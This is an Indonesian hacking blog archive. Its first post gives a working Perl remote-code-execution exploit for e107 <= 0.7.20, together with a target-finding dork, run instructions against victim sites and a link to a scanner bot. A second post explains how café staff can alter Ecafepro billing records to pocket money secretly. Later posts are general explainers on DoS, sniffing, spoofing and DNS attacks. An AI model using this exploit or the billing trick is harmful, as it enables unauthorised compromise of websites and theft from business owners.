Daftar Pilihan

Sabtu, 22 Januari 2011

e107 Remote Code Execution + Scanner

Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah :) Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl# Exploit Title: e107 Code Exec

# Date: 05/22/10
# Author: McFly@e107.org
# Software Link: http://e107.org/edownload.php
# Version: e107 <= 0.7.20
# Tested on: Linux/Windows

#!/usr/bin/perl -w
#################################################
# e107 Code Exec // SploitAuthor: McFly@e107.org
#################################################
# These scrubs still haven't released an update!
# Here is a little bit of motivation for them to
# patch one of the most popular, and insecure of
# the PHP web apps available today.
#################################################
# DORK: inurl:e107_plugins
#################################################

use LWP::UserAgent;

my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n");
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!

# Remove comment for proxy support
my $proxy = 'http://127.0.0.1:8118/';
$ENV{http_proxy} = $proxy ? $proxy: 0;

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0");

if ( $proxy )
{
print "[*] Using proxy $proxy \n";
$ua->env_proxy('1');
}

my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");

my $res = $ua->request($req);
my $data = $res->as_string;

if ( $data =~ /"']main_section['"]>(.*)/ )
{
$data = $1;
print "$data\n";
}
else
{
print "$data\n";
}

Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php

Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:

Lihat Videonya Disini: HERE

Download it: HERE

Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.

Source Instant Download Bot Scanner: http://www.shantykooroostvaarders.nl/includes/js/tabs/bnshckr/

Selamat menikmati & semoga berhasil :)

OP Warnet – Hijacking Billing Ecafepro

Binus Hacker Sponsor Banner

permisi numpang share ne…
okelah aku sharekan…

password winrar..: kodokijo

pertama : extrat rarnya,,,

Biling ecafepro mau versi berapa aja bisa..

klo aku pake ecafepro versi 4.05

data repot harian..

nah klik sofware dari aku entr muncul form login

masukan aja password : kodokijo

klo udha entr akan masuk kedatabase biling melalui sofware ini

data base sofware

nah edit aja didata keuangan yang disitu sesuai dgn harga net kalian,,misalkan 1 jam harganya 2500 guestkan brrti waktu tidak dibatasin oleh kita…misalnya dia abis maen guest 4 jam berarti dia kena 12000 nah buka sofware aku login dan klik no tranksaksi yang tadi lalu edit edit waktu menjadi : 00:10 harga menjadi 1000…gitu…

klo paket edit aja menjadi paket paling rendah dinet kalian
misalkan klo ditmpt aku
2 jam : 5000
3 jam : 6500
4 jam : 8000
5 jam : 9500

misalnya ada yang maen paket 5 jam,,tgl edit aja deh dari database sofwarenya menjadi paket 2 jam brrtikan harga keuangan 5000 jadi ada uang lebih 4500..
ne screnshoot yang data keuangannya belum aku edit

ne data yang udah aku edit

KLO anda berminat silahkan donload sofwarenya di http://www.ziddu.com/download/9828224/Masterfelix.V.1.2.rar.html
ingat passwordnya :

pswrd winrar : kodokijo
pswrd sofware : kodokijo

download sofwarenya : http://www.ziddu.com/download/9828224/Masterfelix.V.1.2.rar.html
ingat broo dilakukan jangan sampe ketahuan yg punya net..hehehe
klo ketahuan berabe deh nee,,,,



sumber : binushacker

Rabu, 05 Januari 2011

Jenis-jenis Serangan Pada Jaringan Komputer


Jenis-jenis Ancaman pada jaringan komputer
Berikut ini akan dijelaskan beberapa tipe-tipe serangan yang dapat dilancarkan oleh pihak-pihak
tertentu terhadap sebuah jaringan komputer:

DOS/DDOS
Denial of Services dan Distributed Denial of Services adalah sebuah metode serangan yang
bertujuan untuk menghabiskan sumber daya sebuah peralatan jaringan komputer sehingga
layanan jaringan komputer menjadi terganggu.
Salah satu bentuk serangan ini adalah 'SYN Flood Attack', yang mengandalkan kelemahan
dalam sistem 'three-way-handshake'. 'Three-way-handshake' adalah proses awal dalam
melakukan koneksi dengan protokol TCP. Proses ini dimulai dengan pihak klien mengirimkan
paket dengan tanda SYN. Lalu kemudian pihak server akan menjawab dengan mengirimkan
paket dengan tanda SYN dan ACK. Terakhir, pihak klien akan mengirimkan paket ACK.


Setelah itu, koneksi akan dinyatakan terbuka, sampai salah satu pihak mengirimkan paket FIN
atau paket RST atau terjadi connection time-out. Dalam proses 'three-way-handshake', selain
terjadi inisiasi koneksi, juga terjadi pertukaran data-data parameter yang dibutuhkan agar
koneksi yang sedang dibuat dalam berjalan dengan baik.
Dalam serangan ini, sebuah host akan menerima paket inisiasi koneksi (Paket dengan flag SYN)
dalam jumlah yang sangat banyak secara terus menerus. Akibatnya host yang sedang diserang
akan melakukan alokasi memori yang akan digunakan untuk menerima koneksi tersebut dan
karena paket inisiasi terus-menerus diterima maka ruang memori yang dapat digunakan untuk
menerima koneksi akan habis. Karena semua ruang memori yang dapat digunakan untuk
menerima koneksi sudah habis, maka ketika ada permintaan baru untuk melakukan inisiasi
koneksi, host ini tidak dapat melakukan alokasi memori sehingga permintaan baru ini tidak
dapat dilayani oleh host ini. Untuk menghindari pelacakan, biasanya paket serangan yang
dikirimkan memiliki alamat IP sumber yang dipalsukan. Untuk menghadapi serangan seperti
ini, sistem operasi – sistem operasi modern telah mengimplementasikan metode-metode
penanganan, antara lain :

Micro-blocks. Ketika ada sebuah host menerima paket inisiasi, maka host akan
mengalokasikan ruang memori yang sangat kecil, sehingga host tersebut bisa menerima
koneksi lebih banyak. Diharapkan ruang memori dapat menampung semua koneksi
yang dikirimkan, sampai terjadi connection-time-out, dimana koneksi-koneksi yang
stale, yaitu koneksi yang tidak menyelesaikan proses 'three-way-handshake' atau sudah
lama tidak ada transaksi data, akan dihapuskan dari memori dan memberikan ruang bagi
koneksi-koneksi baru. Metode ini tidak terlalu efektif karena bergantung pada kecepatan
serangan dilakukan, apabila ternyata kecepatan paket serangan datang lebih cepat
daripada lamanya waktu yang perlu ditunggu agar terjadi connection-time-out pada
paket-paket yang stale, make ruang memori yang dapat dialokasikan akan tetap habis.

SYN Cookies. Ketika menerima paket inisiasi, host penerima akan mengirimkan paket
tantangan yang harus dijawab pengirim, sebelum host penerima mengalokasikan
memori yang dibutuhkan. Tantangan yang diberikan adalah berupa paket SYN-ACK
dengan nomor urut khusus yang merupakan hasil dari fungsi hash dengan input alamat
IP pengirim, nomor port, dll. Jawaban dari pengirim akan mengandung nomor urut
tersebut. Tetapi untuk melakukan perhitungan hash membutuhkan sumber-daya
komputasi yang cukup besar, sehingga banyak server-server yang aplikasinya
membutuhkan kemampuan komputasi tinggi tidak mempergunakan metode ini. Metode
ini merubah waktu peng-alokasian memori, yang tadinya pada awal dari proses 'three-
way-handshake', menjadi diakhir dari proses tersebut. (notes: pada standard TCP/IP

yang baru, ditentukan bahwa diperlukan cara yang lebih baik untuk menentukan urut
paket, sehingga sulit untuk ditebak. Jadi kemungkinan secara default, metode ini akan
digunakan pada seluruh peralatan jaringan komputer atau sistem operasi yang ada).

RST Cookies. Mirip dengan SYN Cookies, hanya tantangan yang dikirimkan host
penerima ke pengirim adalah sebuah paket yang salah. Apabila pengirim adalah
pengirim yang valid, maka pengirim akan mengirimkan paket RST lalu mengulang
kembali koneksi. Ketika penerima menerima paket RST, host tersebut tahu bahwa
pengirim adalah valid dan akan menerima koneksi dari pengirim dengan normal.
Karena ada masalah dengan implementasi lapisan TCP/IP, metode ini kemungkinan
tidak kompatibel dengan beberapa sistem operasi. Metode ini merubah waktu peng-
alokasian memori, yang tadinya pada awal dari proses 'three-way-handshake', menjadi
diakhir dari proses tersebut.

Bentuk lain dari serangan DOS adalah 'Smurf Attack' yang mempergunakan paket ping request.
Dalam melakukan penyerangan, penyerang akan mengirimkan paket-paket ping request ke
banyak host dengan merubah alamat IP sumber menjadi alamat host yang akan diserang. Host-
host yang menerima paket ping request tersebut akan mengirimkan paket balasan ke alamat IP
host korban serangan. Untuk serangan dapat mengganggu sistem korban, host yang menjawab
paket ping request harus cukup banyak. Oleh karena itu, biasanya paket ping request akan
dikirimkan ke alamat broadcast dari sebuah kelompok jaringan komputer, sehingga host-host
pada kelompok jaringan komputer tersebut secara otomatis akan menjawab paket tersebut.

DOS juga dapat dilakukan dengan cara mengirimkan permintaan layanan yang diberikan oleh
sebuah host secara berlebihan atau terus menerus. Tujuan dari serangan model ini adalah untuk
membuat host menjadi terlalu sibuk atau kehabisan sumber daya komputasi sehingga tidak
dapat melayani permintaan-permintaan lainnya.

Perkembangan lanjutan dari DOS adalah DDOS, dimana host yang terlibat dalam serangan
lebih dari satu dan tersebar di banyak tempat. Banyaknya host yang terlibat dalam serangan
akan meningkatkan efek serangan dan mempersulit pihak yang diserang untuk mempertahankan
diri ataupun melakukan pelacakan asal serangan. Pada banyak kejadian, host-host yang terlibat
dalam serangan, tidak semuanya sadar bahwa mereka terlibat dalam sebuah serangan DDOS.
Host-host tersebut telah disusupi terlebih dahulu oleh penyerang, sehingga penyerang dapat
mempergunakan host tersebut untuk melakukan serangan. Penyusupan dapat dilakukan dengan
cara mengirimkan trojan atau worm ke banyak host.

Packet Sniffing
Packet Sniffing adalah sebuah metode serangan dengan cara mendengarkan seluruh paket yang
lewat pada sebuah media komunikasi, baik itu media kabel maupun radio. Setelah paket-paket
yang lewat itu didapatkan, paket-paket tersebut kemudian disusun ulang sehingga data yang
dikirimkan oleh sebuah pihak dapat dicuri oleh pihak yang tidak berwenang.
Hal ini dapat dilakukan karena pada dasarnya semua koneksi ethernet adalah koneksi yang
bersifat broadcast, di mana semua host dalam sebuah kelompok jaringan akan menerima paket
yang dikirimkan oleh sebuah host. Pada keadaan normal, hanya host yang menjadi tujuan paket
yang akan memproses paket tersebut sedangkan host yang lainnya akan mengacuhkan paket-
paket tersebut. Namun pada keadaan tertentu, sebuah host bisa merubah konfigurasi sehingga
host tersebut akan memproses semua paket yang dikirimkan oleh host lainnya.
Cukup sulit untuk melindungi diri dari gangguan ini karena sifat dari packet sniffing yang
merupakan metode pasif (pihak penyerang tidak perlu melakukan apapun, hanya perlu
mendengar saja). Namun ada beberapa hal yang bisa dilakukan untuk mengatasi hal ini, yaitu:




Secara rutin melakukan pemeriksaan apakah ada host di jaringan kita yang sedang
dalam mode promiscuous, yaitu sebuah mode dimana host tersebut akan memproses
semua paket yang diterima dari media fisik. Akan tetapi hal ini hanya akan melindungi
diri kita terhadap packet sniffer yang berada pada satu kelompok jaringan dengan kita.
Penyerang yang melakukan sniffing dari luar jaringan komputer kita tidak akan
terdeteksi dengan menggunakan metode ini.
Mempergunakan SSL atau TLS dalam melakukan pengiriman data. Ini tidak akan
mencegah packet sniffer untuk mencuri paket yang dikirimkan, akan tetapi paket-paket
yang dicuri tidak bisa dipergunakan karena dikirimkan dengan menggunakan format
yang terenkripsi.
Melakukan koneksi VPN, sehingga tetap bisa mempergunakan aplikasi yang tidak
mendukung SSL atau TLS dengan aman.

Packet Sniffing sebagai tools pengelola jaringan
Sebenarnya selain sebagai menjadi alat untuk melakukan kejahatan, packet sniffer juga bisa
digunakan sebagai alat pertahanan. Dengan melakukan analisa paket-paket yang melalui sebuah
media jaringan komputer, pengelola dapat mengetahui apabila ada sebuah host yang
mengirimkan paket-paket yang tidak normal, misalnya karena terinfeksi virus. Sebuah IDS juga
pada dasarnya adalah sebuah packet sniffer yang bertugas untuk mencari host yang
mengirimkan paket-paket yang berbahaya bagi keamanan. Selain itu packet sniffer juga bisa
menjadi alat untuk melakukan analisa permasalahan yang sedang dihadapi sebuah jaringan
komputer. Misalkan ketika sebuah host tidak dapat berhubungan dengan host lainnya yang
berada pada kelompok jaringan yang berbeda, maka dengan packet sniffer, pengelola jaringan
komputer dapat melakukan penelusuran dimana permasalahan koneksi itu terletak.

IP Spoofing
IP Spoofing adalah sebuah model serangan yang bertujuan untuk menipu seseorang. Serangan
ini dilakukan dengan cara mengubah alamat asal sebuah paket, sehingga dapat melewati
perlindungan firewall dan menipu host penerima data. Hal ini dapat dilakukan karena pada
dasarnya alamat IP asal sebuah paket dituliskan oleh sistem operasi host yang mengirimkan
paket tersebut. Dengan melakukan raw-socket-programming, seseorang dapat menuliskan isi
paket yang akan dikirimkan setiap bit-nya sehingga untuk melakukan pemalsuan data dapat
dilakukan dengan mudah.

Salah satu bentuk serangan yang memanfaatkan metode IP Spoofing adalah 'man-in-the-middle-
attack'. Pada serangan ini, penyerang akan berperan sebagai orang ditengah antara dua pihak
yang sedang berkomunikasi. Misalkan ada dua pihak yaitu pihak A dan pihak B lalu ada
penyerang yaitu C. Setiap kali A mengirimkan data ke B, data tersebut akan dicegat oleh C, lalu
C akan mengirimkan data buatannya sendiri ke B, dengan menyamar sebagi A. Paket balasan
dari B ke A juga dicegat oleh C yang kemudian kembali mengirimkan data 'balasan' buatannya
sendiri ke A. Dengan cara ini, C akan mendapatkan seluruh data yang dikirimkan antara A dan
B, tanpa diketahui oleh A maupun C.
Untuk mengatasi serangan yang berdasarkan IP Spoofing, sebuah sistem operasi harus dapat
memberikan nomor-urut yang acak ketika menjawab inisiasi koneksi dari sebuah host. Dengan
nomor urut paket yang acak, akan sangat sulit bagi seorang penyerang untuk dapat melakukan
pembajakan transmisi data.

Selain itu, untuk mengatasi model serangan 'man-in-the-middle-attack', perlu ada sebuah
metode untuk melakukan otentikasi host yang kita hubungi. Otentikasi dapat berupa digital-
certificate yang eksklusif dimiliki oleh host tersebut.




Konfigurasi firewall yang tepat juga dapat meningkatkan kemampuan jaringan komputer dalam
menghadapi IP Spoofing. Firewall harus dibuat agar dapat menolak paket-paket dengan alamat
IP sumber jaringan internal yang masuk dari interface yang terhubung dengan jaringan
eksternal.

DNS Forgery
Salah satu cara yang dapat dilakukan oleh seseorang untuk mencuri data-data penting orang lain
adalah dengan cara melakukan penipuan. Salah satu bentuk penipuan yang bisa dilakukan
adalah penipuan data-data DNS. DNS adalah sebuah sistem yang akan menterjemahkan nama
sebuah situs atau host menjadi alamat IP situs atau host tersebut. Cara kerja DNS cukup
sederhana, yaitu sebuah host mengirimkan paket (biasanya dengan tipe UDP) yang pada header
paket tersebut berisikan alamat host penanya, alamat DNS resolver, pertanyaan yang diinginkan
serta sebuah nomor identitas. DNS resolver akan mengirimkan paket jawaban yang sesuai ke
penanya. Pada paket jawaban tersebut terdapat nomor identitas, yang dapat dicocokkan oleh
penanya dengan nomor identitas yang dikirimnya. Oleh karena cara kerja yang sederhana dan
tidak adanya metode otentikasi dalam sistem komunikasi dengan paket UDP, maka sangat
memungkinkan seseorang untuk berpura-pura menjadi DNS resolver dan mengirimkan paket
jawaban palsu dengan nomor identitas yang sesuai ke penanya sebelum paket jawaban dari
DNS resolver resmi diterima oleh penanya. Dengan cara ini, seorang penyerang dapat dengan
mudah mengarahkan seorang pengguna untuk melakukan akses ke sebuah layanan palsu tanpa
diketahui pengguna tersebut. Sebagai contoh, seorang penyerang dapat mengarahkan seorang
pengguna Internet Banking untuk melakukan akses ke situs Internet Banking palsu yang
dibuatnya untuk mendapatkan data-data pribadi dan kartu kredit pengguna tersebut.
Untuk dapat melakukan gangguan dengan memalsukan data DNS, seseorang membutuhkan
informasi-informasi di bawah ini :
Nomor identitas pertanyaan (16 bit)
Port tujuan pertanyaan
Alamat IP DNS resolver
Informasi yang ditanyakan
Waktu pertanyaan.
Pada beberapa implementasi sistem operasi, informasi diatas yang dibutuhkan seseorang untuk
melakukan penipuan data DNS bisa didapatkan. Kunci dari serangan tipe ini adalah, jawaban
yang diberikan DNS resolver palsu harus diterima oleh penanya sebelum jawaban yang
sebenarnya diterima, kecuali penyerang dapat memastikan bahwa penanya tidak akan menerima
jawaban yang sebenarnya dari DNS resolver yang resmi.

DNS Cache Poisoning
Bentuk lain serangan dengan menggunakan DNS adalah DNS Cache Poisoning. Serangan ini
memanfaatkan cache dari setiap server DNS yang merupakan tempat penyimpanan sementara
data-data domain yang bukan tanggung jawab server DNS tersebut. Sebagai contoh, sebuah
organisasi 'X' memiliki server DNS (ns.x.org) yang menyimpan data mengenai domain 'x.org'.
Setiap komputer pada organisasi 'X' akan bertanya pada server 'ns.x.org' setiap kali akan
melakukan akses Internet. Setiap kali server ns.x.org menerima pertanyaan diluar domain
'x.org', server tersebut akan bertanya pada pihak otoritas domain. Setelah mendapatkan jawaban
yang dibutuhkan, jawaban tersebut akan disimpan dalam cache, sehingga jika ada pertanyaan
yang sama, server 'ns.x.org' dapat langsung memberikan jawaban yang benar. Dengan tahapan-
tahapan tertentu, seorang penyerang dapat mengirimkan data-data palsu mengenai sebuah
domain yang kemudian akan disimpan di cache sebuah server DNS, sehingga apabila server
tersebut menerima pertanyaan mengenai domain tersebut, server akan memberikan jawaban
yang salah. Patut dicatat, bahwa dalam serangan ini, data asli server DNS tidak mengalami




perubahan sedikitpun. Perubahan data hanya terjadi pada cache server DNS tersebut.

Cara yang paling efektif dalam menghadapi serangan yang merubah DNS server adalah dengan
melakukan otentikasi host yang akan kita hubungi. Model otentikasi yang banyak digunakan
saat ini adalah dengan mempergunakan digital certificate. Dengan digital certificate, seseorang
dapat dengan yakin bahwa host yang dia akses adalah host yang sebenarnya

sumber :yosike

KONSEP MEKANISME PENYERANGAN JARINGAN BENTUK SERANGAN JARINGAN


Bentuk penyerangan pada jaringan saat ini makin beragam, karena kemajuan di bidang teknologi semakin berkembang pesat dan cara-cara penyerangannya pun semakin berbahaya.

PENGERTIAN PENYERANGAN JARINGAN

Penyerangan jaringan adalah penyerangan yang sengaja dilakukan oleh seseorang atau kelompok tertentu terhadap suatu perusahaan/individu untuk kepentingan pribadi mereka.

MODEL SERANGAN JARINGAN

  1. Interruption : Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.
  2. Interception : Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).
  3. Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
  4. Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.

JENIS DAN NAMA-NAMA PENYERANGAN

1. BOTNET

Botnet terdiri dari dua kata, yaitu BOT (program yang otomatis) dan NET (networking). Jadi botnet merupakan program yang secara otomatis, bekerja dalam network tertentu yang bertujuan untuk mendapatkan sesuatu secara besar-besaran/brutal, karena semua komputer yang terhubung dalam jaringan akan di serang semuanya secara otomatis.

Contoh : conficker.vmx. Botnet ini sulit sekali di hilangkan, karena mempunyai fitur autoupdate ke server yang ditunjuk, sehingga conficker ini sulit di lacak dan di hilangkan.

2. Memaksa masuk dan kamus password

Menyerang database atau menyerang login prompt yang sedang aktif.

Brute Force: upaya menemukan password dari account user dengan cara sistematis, mencoba dengan berbagai kombinasi angka, huruf dan simbol.

Dictionary: upaya menemukan password dengan mencoba beebagai kemungkinan password yang dipakai user dengan kamus password yagn sudah di definisikan sebelumnya.

Cara mengatasi: Aturan pembuatan password yang kuat, misalnya tidak boleh mengginakan tanggal lahir, nama, password dengan kombinasi huruf dan angka.

3. Denial of Service (DoS)

Layanan jaringan menjadi macet/mampet.

Bentuk: mengirim paket data yang besar terhadap suatu server dan memanfaatkan celah yang rentan dari sistem operasi.

Akibat seranganya: sistem crash atau pemakaian CPU 100%.

Jenis-jenis DoS: Distributed Denial of Service (DDoS), Distributed Reflective Denial of Service (DRDoS).

Contoh akibat serangan: layanan pemesanan selalu gagal atau username tidak bisa login, daftar barang tidak bisa muncul atau sudah dicetak.

4. Identity Teft

Identity Teft merupakan pencurian tentang identitas kita yang dilakukan melalui komputer offline, jaringan LAN, internet maupun melalui transaksi-transaksi dalam kehidupan sehari-hari.

5. Smurf Attack

Membanjiri komputer client dengan sampah.

Mengirimkan broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan menerima paket broadcast.

Ada yang menggolongkan sebagai DoS.

6. Ping of Death

Menggunakan tool khusus dengan mengirimkan paket pingoversized yang banyak sekali kepada korbanya.

Akibatnya: sistem crash, freeze atau reboot.

Ada yang mengolongkan sebagai DoS.

7. Stream Attack

Mengirim jumlah paket besar menuju port pada sistem korban menggunakan sumber nomor yan random.

Ada yang menggolongkan sebagai DoS.

8. Spoofing

Seni untuk menjelma menjadi sesuatu yang lain.

IP address atau node source yang asli diganti IP address atau node source yang lain.

Contoh: pemalsual web Paypal.

9. Serangan Pembajakan (Man in the Middle)

Mengkomposisikan dua titik link komunikasi dengan jalan : menyusup antara dua party dan para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau mekanisme store and forward.

Akibat: para penyerang bisa menangkap logon crendensial atau data sensitive ataupun mampu mengubah isi pesan dari kedua titik informasi.

10. Spamming

Spam merupakan email/pesan diskusi forum yang tak di undang berupa iklan dari vendor atau bisa berisi trojan horse.

Biasanya datang bertubi-tubi tanpa diminta dan sering kali tidak dikehendaki oleh penerimanya.

Spamming mirip dengan DoS.

Cara kerja: pembuat spam akan membuat mailling list dari alamat-alamat email yang ditemukan dari situs-situs terkenal seperti facebook, multiply, friendster dll. Setelah itu file-file akan disebarkan melalui email-email tersebut.

11. Sniffer (snooping attack)

Kegiatan user perusak yang ingin mendapatkan informasi atau traffic melalui jaringan.

Merupakan program penangkap paket data yang bisa di duplikasi isi paket melalui media jaringan ke dalam file.

Fokus untuk mendapatkan logon crendensial, kunci rahasia, password dan lainnya.

Contoh: menyadap suatu pengiriman program saat memasukkan password dengan tujuan mendapatkan password pengguna atau menduplikasikan program yang dikirimi program.

12. Crackers

User yang ingin merusak sistem.

Akibat: kegiatan mencuri data/ide, disable system, kompromi keamanan, opini negative public, kehilangan pasar saham, mengurangi keuntungan, kehilangan produktivitas.

Contoh: seorang pencopy software seperti microsoft.

Keahlian minimal cracker: bisa membuat program C, C++, atau Perl, memiliki pengetahuan TCP/IP, menguasai sistem operasi UNIX atau VMS, suka mengkoleksi software dan hardware lama.

13. Hacker

Seseorang atau beberapa orang yang ahli dan mengetahuo seluk beluk komputer , baik software, hardware, keamanan atau jaringanya. Sesungguhnya tudak semua hacker melakukan kejahatan, ada hacker yang berfungsi sebagai peneliti dan pengembang dengan cara menelusuri

Lubang-lubang keamanan sebuah software.

14. Back Door

Serangan dengan sengaja membuka suatu pintu belakang bagi pengunjung tertentu, tanpa disadari oleh orang yang menginstall software.

Contoh: E-bay untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi di antara pembeli dan penjual, termasuk kartu kredit.

15. Social Enginnering

Bentuk serangan yang memanfaatkan sisi kelemahan manusia, misalnya dengan merekayasa perasaan user sehingga user bersedia mengirim infirmasi kepada hacker untuk selanjutnya digunakan untuk merusak sistem.

Misalnya: email yang diminta target untuk membuak attachment yang disisipi worm/trojan horse untuk merusak jaringan.

16. DNS Poisoning

Usaha merubah atau merusak isi DNS sehingga semua akses yang memakai DNS akan di salurkan ke alamat yang salah atau alamat yang dituju tidak bisa di akses.

User melakukan login pada rekening internetnya. Karena sudah dialihkan, maka ia mengakses ke suatu situs palsu yang serupa dan telah dipersiapkan oleh hacker.

17. Phising Mail

Email yang seolah-olah dikirim dari bank di tempat kita menyimpan uang, dari situs tempat kita membeli barang secara online. Bila kita login ke dalam situs palsu tersebut maka situs itu akan mencuru username dan password yang akan merugikan kita.

Berasal dari bahasa Inggris yang berarti pengelabuan. Phishing berupa webpage yang alamatnya mirip dengan web aslinya. Misalnya www.klikbca.com diubah menjadi www.clickbca.com atau www.klikkbca.com. Jika dilihat dari ketiganya memiliki pelafalan yang sama, tetapi tujuanya berbeda. Klick BCA bertujuan untuk mengakses suatu alamat bank swasta di Indonesia, tetapi click BCA bertujuan ke suatu komputer dimana pemiliknya mengetahui username dan password anda jika anda memasuki web tersebut.

18. Adware

Kependekan dari Adversiting Software, yaitu sebuah program untuk mengiklankan sesuatu yang dapat secara otomatis tampil dalam web browser atau pop up.

Adware bisda terdownload tanpa sengaja bila kita tidak teliti saat mengklik iklan yang tampil dalam sebuah pop-up

Ada yang menyamakan dengan spyware.

19. Virus dan Worm

Program komputer aktif yang tersembunyi dan membahayakan, karena besifat merusak sistem komputer. Virus dapat menginfeksi program komputer lain atau file data serta dapat terdistribusi ke komputer lain.

20. Spyware

Merupakan program komputer yang biasanya tanpa sengaja terinstall untuk melakukan perusakan, penyalinan atau pengintipan aktifitas sebuah komputer, sehingga segala aktifitas saat menggunakan komputer dapat dipantau, dicopy dari tempat lain. Spyware biasanya terinstall karena katidak telitian pengguna komputer saat mengklik suatu pop-up atau browsing internet.

21. Remote Attack

Segala bentuk serangan terhadap suatu sistem dimana penyerangan tidak memiliki kendali terhadap mesin tersebut karena melakukan dari jarak jauh di luar sistem jaringan atau media transmisi.

22. Hole

Kondisi dari software atau hardware yang bisa di akses oleh pemakai yang memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses otorisasi.

23. Phreaking

Perilaku menjadikan pengamanan telepon melemah.

24. Wireless Attack

Biasanya berbentuk pencurian bandwidth.

25. HTTPD Attack

Memanfaatkan kerawanan webserver, misalnya: buffer, overflows, httpd bypasses. Cross scripting, web code vulnerabilities, URL floods.

Contoh: melalui cross XSS seorang attacker bisa mengeksploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membaca informasi penting dan mengexpose data sensitif seperti nomor credit card dan password.

26. Pencurian Cookie

Cookie adalah kumpulan data yang dikirimkan oleh server atau admin sebuah website kepada web browser yang digunakan. Kemudian web browser akan mengembalikan lagi data tersebut untuk mengakses website tanpa ada perubahan sedikitpun.

Kenapa berbahaya? Untuk mengakses sebuah situs dibutuhkan transfer cookie dari user ke server dan sebaliknya, sebagai proses authentifikasi dan enkripsi data sekaligus konfirmasi identitas user. Sehingga jika cookie dicuri, maka pencuri dapat menggunakan cookie tersebut untuk mengakses situs ilegal maupun memalsukan identitasnya.

Pencurian cookie dapat menggunakan script.


sumber : anggiblog